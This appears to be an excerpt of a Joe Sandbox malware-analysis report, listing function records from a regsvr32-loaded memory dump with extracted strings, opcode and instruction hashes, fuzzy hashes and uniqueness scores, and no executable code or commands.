                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 6|4$;|-
                                                                                                                                            • API String ID: 0-2897245347
                                                                                                                                            • Opcode ID: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                                                                                                            • Instruction ID: 839a7c11e172a9a14e1c367a044feafa9aab422ef7ede3a919e78660e0b6ca0a
                                                                                                                                            • Opcode Fuzzy Hash: 35605434c5429477d06d2e5b9b1bfa34856c77736f87f3e727847c01dfef7208
                                                                                                                                            • Instruction Fuzzy Hash: C0714B7090474D8FCF88DFA4C8866EEBBF0FB48308F114619E88AA7251D7789645CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: U$U#
                                                                                                                                            • API String ID: 0-861755185
                                                                                                                                            • Opcode ID: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                                                                                                            • Instruction ID: 3d07f47d2f6b9c27b0e4fe7d5859b29f381f1ada24735b7dc646a2f801c86eef
                                                                                                                                            • Opcode Fuzzy Hash: 2086c1731bcfc2cec1958e1d1a3f8cb927817e2dd584414818c7a6dfab91bab1
                                                                                                                                            • Instruction Fuzzy Hash: 0C515C7150C7449FC7A8DF18D4C67AAB7E0FB88310F90991DF8CAC7251EB70A9598B82
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: fK$Pr
                                                                                                                                            • API String ID: 0-2696692655
                                                                                                                                            • Opcode ID: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                                                                                                            • Instruction ID: dfe3628fe45c31a405763d5fff7ed8f4d77ec04c4bb6b45016b3f1679df2575b
                                                                                                                                            • Opcode Fuzzy Hash: 9489b844c734f0d344b598ec7bcb8736a735df1c6bae6eaa62d1b735c6b442f4
                                                                                                                                            • Instruction Fuzzy Hash: 907116B090474E8FDB88CF28C88A6DE7BF0FB18358F515219FC4AA6260D774D598CB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: n\$z+&
                                                                                                                                            • API String ID: 0-1414119057
                                                                                                                                            • Opcode ID: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                                                                                                            • Instruction ID: eeb2c5940d29436bcd670e7d8a2b521530b450e3042878bcb8e4954d48490cde
                                                                                                                                            • Opcode Fuzzy Hash: f24be46eeb560fbb290949dbfd7d05873455e782ddfe7ec7ed40b48d6508653b
                                                                                                                                            • Instruction Fuzzy Hash: 22612070A04B0C8BCBA9DF98D48AADDB7F1FB58344F00411DE846A7390DBB8950ACB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$50
                                                                                                                                            • API String ID: 0-2436285167
                                                                                                                                            • Opcode ID: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                                                                                                            • Instruction ID: 63debb9af518b5fca5d59737c01840b12b974a655eea7ff458552c4fa6b671e5
                                                                                                                                            • Opcode Fuzzy Hash: 84d2de074a5e6e1a5d921b58512406c284d81fdc35452f42d6b6a069db9f8ad4
                                                                                                                                            • Instruction Fuzzy Hash: 3671DF705087848FD769CF28C58965ABBF0FBC6344F008A1DF68686260CBB6D949CF03
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ,{$uC
                                                                                                                                            • API String ID: 0-1099860252
                                                                                                                                            • Opcode ID: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                                                                                                            • Instruction ID: df29777c25f03bc51b29c5e68a382a2b48421fa47568a9dd7f4acde699563025
                                                                                                                                            • Opcode Fuzzy Hash: 2af00e218d12abdb99ef7e76f2ba815a0f7da0c0d962cc97f106519d062cd6fe
                                                                                                                                            • Instruction Fuzzy Hash: 28612D71A04B0C8FDBA9DF98D08A7DEB7F1FB48344F004119E406E7291DBB8990ADB85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: "C$*6TO
                                                                                                                                            • API String ID: 0-2251823003
                                                                                                                                            • Opcode ID: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                                                                                                            • Instruction ID: 1108d3b1afe4df31317b10417d35e55e698c36e02fd161062712c06e930ceb12
                                                                                                                                            • Opcode Fuzzy Hash: 11a52743e991166c772ae58171141d3b918ce8d4020b5bd660e65aa41626bcf5
                                                                                                                                            • Instruction Fuzzy Hash: 598166B550130DCFCB98DF28C58A59D3BA8FB49308F40812AFC1E9A264D3B4E659DB46
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: _ N$nkz
                                                                                                                                            • API String ID: 0-4083044659
                                                                                                                                            • Opcode ID: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                                                                                                            • Instruction ID: b07831c94fe2cbd7ac58294498593f0ee6961182af88fd212fccb4805bec53d6
                                                                                                                                            • Opcode Fuzzy Hash: a2e505ed0ed44acca9d37efa5475ae9917bfda84fefcb3a28f95bfb4043916ce
                                                                                                                                            • Instruction Fuzzy Hash: 39513971D04A1D8BDF99CFA8C5457EEBBB1FB48344F108119E415BB250CBB89A09CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: LiD+$?
                                                                                                                                            • API String ID: 0-3739020763
                                                                                                                                            • Opcode ID: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                                                                                                            • Instruction ID: 2f7d624153028320349e4a0adb7356b45dc1f3746b227896fac10cb383cb0630
                                                                                                                                            • Opcode Fuzzy Hash: bc963e11fa834f262c09c021a462739b615030ee8f9d2598156052fa386473db
                                                                                                                                            • Instruction Fuzzy Hash: F35191B590034E8FCB48DF64D48A8DE7FB0FB68398F214619E815A7210D7B496A4CFD5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: %&Iv$\o
                                                                                                                                            • API String ID: 0-2950252169
                                                                                                                                            • Opcode ID: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                                                                                                            • Instruction ID: 7d8516b09fccf329ce1ee45da69bc8f76dfc96f1b67d05b04ebb17f55f6537e3
                                                                                                                                            • Opcode Fuzzy Hash: e3b847a27b1fdf8219116b43965b4243214bd6bbc489cbb0191219741f6e6deb
                                                                                                                                            • Instruction Fuzzy Hash: 7041C2B090074E8FCB48DF28C88A4DE7FB1FB68398F514619EC56A7250D7B496A4CBC4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: |<$P;
                                                                                                                                            • API String ID: 0-71676942
                                                                                                                                            • Opcode ID: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                                                                                                            • Instruction ID: b926ab4478da67f81816527f76e4a4189747c2b1a61b322854fb240660ec53f5
                                                                                                                                            • Opcode Fuzzy Hash: d8b30cb9b0bbde5f967eaf6e88493efae150f481542faaeeec2b89fd53c9bf9b
                                                                                                                                            • Instruction Fuzzy Hash: 0F41F4B190078ECFCF48DF68C88A5DE7BB0FB58318F10461DE82AA6250D3B49665CF84
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #X$< @
                                                                                                                                            • API String ID: 0-1734357072
                                                                                                                                            • Opcode ID: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                                                                                                            • Instruction ID: 53d5526a666e2e4b0aa3df313d94281727ef5dde582db7952040e92a2ea044da
                                                                                                                                            • Opcode Fuzzy Hash: efe0763d8a7a245e8cb996b606fb90cb3ba626e454cc1a7dd4141ea463f73824
                                                                                                                                            • Instruction Fuzzy Hash: E241C3B090078E8FCF48DF68C95A5DE7BB0FB58348F104A1DEC6AA6250D3B49665CF94
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .B$X&x
                                                                                                                                            • API String ID: 0-2125001607
                                                                                                                                            • Opcode ID: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                                                                                                            • Instruction ID: 406be0e8b3d674fc45ad7aec45ce8f3a41fae9dcbe4fb503a73b8d88e4a7390b
                                                                                                                                            • Opcode Fuzzy Hash: b56e4be042cf3e20bfd4171d949980e8bdde88a4c8b77932d249eea416ff403a
                                                                                                                                            • Instruction Fuzzy Hash: F541C3B190034E8BDF48DF68C98A4DE7BB1FB58358F00461DE866AB350D3B89665CF85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: D-o$S1
                                                                                                                                            • API String ID: 0-2248371139
                                                                                                                                            • Opcode ID: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                                                                                                            • Instruction ID: c824313cc5550ea8d08e24e936909b38c1116e4b52b8e35a6cfdfb4e8fb0d5b5
                                                                                                                                            • Opcode Fuzzy Hash: b2af9136cfd81d84eb1aedf16953768fff15e9d6dc77d4de408be5ef0b131a39
                                                                                                                                            • Instruction Fuzzy Hash: 7F418F7090074E8FCF88CF68C48A5DEBFB0FB28398F144619E856A6250D3B496A5CFC5
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ")v$kNTY
                                                                                                                                            • API String ID: 0-925696221
                                                                                                                                            • Opcode ID: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                                                                                                            • Instruction ID: 3d1cde25fc61112586e0ccbc864a2b9889115514f3b9559dcc74a8c2fbc402f5
                                                                                                                                            • Opcode Fuzzy Hash: 2d468f080be7dc4ac37fbc5ab55ab08a385f91380d02a95960c4866fb202e0cd
                                                                                                                                            • Instruction Fuzzy Hash: 49317CB16187858B8348DF28C45641ABBE1FBCD70CF544B2DF4CAAB251D738D6128B4B
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: O$\u
                                                                                                                                            • API String ID: 0-3775190597
                                                                                                                                            • Opcode ID: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                                                                                                            • Instruction ID: b3d17dff366e7d439aca65bd494037a1e9e1cb33d0f26cc5f3c7e2fad645fe6e
                                                                                                                                            • Opcode Fuzzy Hash: 81226de3c00d9588fcdb855554b2562b3d5d50c3db8a2dd8ff0fab91db437570
                                                                                                                                            • Instruction Fuzzy Hash: 5B31C4B0528781AFC798DF28D09991ABBF1FBC9304F806A1DF98A8B350D774D845CB42
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: +N$:s[
                                                                                                                                            • API String ID: 0-2992701377
                                                                                                                                            • Opcode ID: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                                                                                                            • Instruction ID: 2af45dfac4c7ae0da7497fa8c295952f08e7f96bebb69c710dc1a077a3b8364b
                                                                                                                                            • Opcode Fuzzy Hash: 59945e4bfd5c1812b410bc992af75b99beb9f24da50121ece688e224e72b4b08
                                                                                                                                            • Instruction Fuzzy Hash: 443192B5528381ABC388DF28C48A81FBBE1FBC9359F806A1DF8C696261D734D5458B43
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 'yN$k
                                                                                                                                            • API String ID: 0-35230329
                                                                                                                                            • Opcode ID: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                                                                                                            • Instruction ID: 07b651401a32326000ca6cd35722393aebb0696fbf8e2d5e5a89f081ef8d3ba1
                                                                                                                                            • Opcode Fuzzy Hash: 664b9cbffe37651652d085acf9af43cce7b6a19192dfc0ee1d7ff8525738b321
                                                                                                                                            • Instruction Fuzzy Hash: DE318FB191478E8BDB48DF68D8494DF3BF0FB58308F004A29EC6A9A250D7B49664CF95
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ]2F$lt
                                                                                                                                            • API String ID: 0-3307743551
                                                                                                                                            • Opcode ID: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                                                                                                            • Instruction ID: b2e8e3d622355c2c7a8d87ad16832996e77f732c72c2020fcd3ed114b96953d1
                                                                                                                                            • Opcode Fuzzy Hash: e35954fd64214c4dc75024e05a92e9afc61a62ba820b5d5e41e037a5dcd882da
                                                                                                                                            • Instruction Fuzzy Hash: BC218C70528385ABC798CF24C1CA94BBBE1FBD4758F906A0DF8828B264D774D909CB43
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: t2i.
                                                                                                                                            • API String ID: 0-2317288456
                                                                                                                                            • Opcode ID: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                                                                                                            • Instruction ID: 45fd1b4f7d9ae1bb3a1595fd0447dfa3858b4c22850e921c91e36994c5fa5290
                                                                                                                                            • Opcode Fuzzy Hash: ddf1efb97a931d6c5f3ee8c67c3fa2b44aa9af6db9e4e5e1b98fbf81237c32be
                                                                                                                                            • Instruction Fuzzy Hash: F4C17C709197489BD7D6DF18C48579EBBE0FB88344F906A1EF486C72A0CB34DA49CB02
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: !
                                                                                                                                            • API String ID: 0-133318149
                                                                                                                                            • Opcode ID: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                                                                                                            • Instruction ID: 4d490125f0736c0523a0bc8c54046deb818a488a36854fcf26dc18eb231edbc7
                                                                                                                                            • Opcode Fuzzy Hash: 9a28524a62feba04ad602aea3c6b43a9e37f0bb3cb72c69032c5b680e6eaa856
                                                                                                                                            • Instruction Fuzzy Hash: 94C1277090474D8BDF48DF68C88A6EE7BF1FB48358F15821DE84AA7250C7789949CF85
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: GP
                                                                                                                                            • API String ID: 0-809347306
                                                                                                                                            • Opcode ID: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                                                                                                            • Instruction ID: b8cc07b6ee5f07dffcf88ae53723e0b0b514af2364763fc1c4f878c703b2f424
                                                                                                                                            • Opcode Fuzzy Hash: c18687982be6c1a2fdabfac97a268a3404b4fe9754ccd0dba6adaab26aa3d97e
                                                                                                                                            • Instruction Fuzzy Hash: 35C18BB190060DCFCF68CF78D55A59D7BF1BB48308F606229F826AA2A2D3B49915CF54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: G
                                                                                                                                            • API String ID: 0-4067352199
                                                                                                                                            • Opcode ID: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                                                                                                            • Instruction ID: 225e36911d9d240547ab15c987b60d96220a9315f181ed6db9e7231e26a901aa
                                                                                                                                            • Opcode Fuzzy Hash: 571051391216adea76df2afa30ecc8bad161d89b390d9c97388838629c1a5ca4
                                                                                                                                            • Instruction Fuzzy Hash: 54A11871A0460CCFDF59DFA8C44A6DDB7F2FB48344F104529E816BB261CB749909CBA9
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: :d
                                                                                                                                            • API String ID: 0-1981401805
                                                                                                                                            • Opcode ID: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                                                                                                            • Instruction ID: 210e0c3814bb066ec4f0600647a6f8918949d15d236ac433349e910c02a539df
                                                                                                                                            • Opcode Fuzzy Hash: 7e01d6742b691afee721fc3f193522d49c245a6ce31efde50cdf5c406c664d98
                                                                                                                                            • Instruction Fuzzy Hash: 55B1067150560DDFCB88DF28C089ADE7BE0FF58308F825229F80AA7255D774DA98DB49
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 'NL
                                                                                                                                            • API String ID: 0-130891299
                                                                                                                                            • Opcode ID: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                                                                                                            • Instruction ID: bb2c5b98f4e45d76fdff147334347c6d164a6d6c8cf2b5048c0250209dce3a22
                                                                                                                                            • Opcode Fuzzy Hash: 8a3ed407222c8cc95b4195594c73c0a0709bd4276b41a18d313f15a757072ddc
                                                                                                                                            • Instruction Fuzzy Hash: 08816770900748CFDB99CF68C4896DE7BF0FB48394F609129F94697261C774D989CB81
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: ETz
                                                                                                                                            • API String ID: 0-3877082699
                                                                                                                                            • Opcode ID: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                                                                                                            • Instruction ID: db1a2cf02a49f3c5a1febdf95057c2803ba9c7043f43a3a74a84a847f8708688
                                                                                                                                            • Opcode Fuzzy Hash: a70674ad09814c9e1798ed159b67f00a2b9c82905ce41e3639f5d760caf2f047
                                                                                                                                            • Instruction Fuzzy Hash: 6281BC34A0674CCBDB65CFA8C0897CDBBF1FF68348F104119E915AA2A6CB70D559CB89
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000010.00000002.323591147.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_16_2_180001000_regsvr32.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: #;*z
                                                                                                                                            • API String ID: 0-1682342327
                                                                                                                                            • Opcode ID: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                                                                                                            • Instruction ID: dbf9c55ae058a2f54c24d1eac6a5ff2fe61b468a3017e99be0a6ffbf3af3057b
                                                                                                                                            • Opcode Fuzzy Hash: b680f4a085bd44a123493e5971e743dba8c621f53e8aa86b84bd23ce7ca92522
                                                                                                                                            • Instruction Fuzzy Hash: EF91E0715042888FCBB9DF24D88A7DA7BA1FB45348F50C229D88ECE261DFB0564DDB01
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

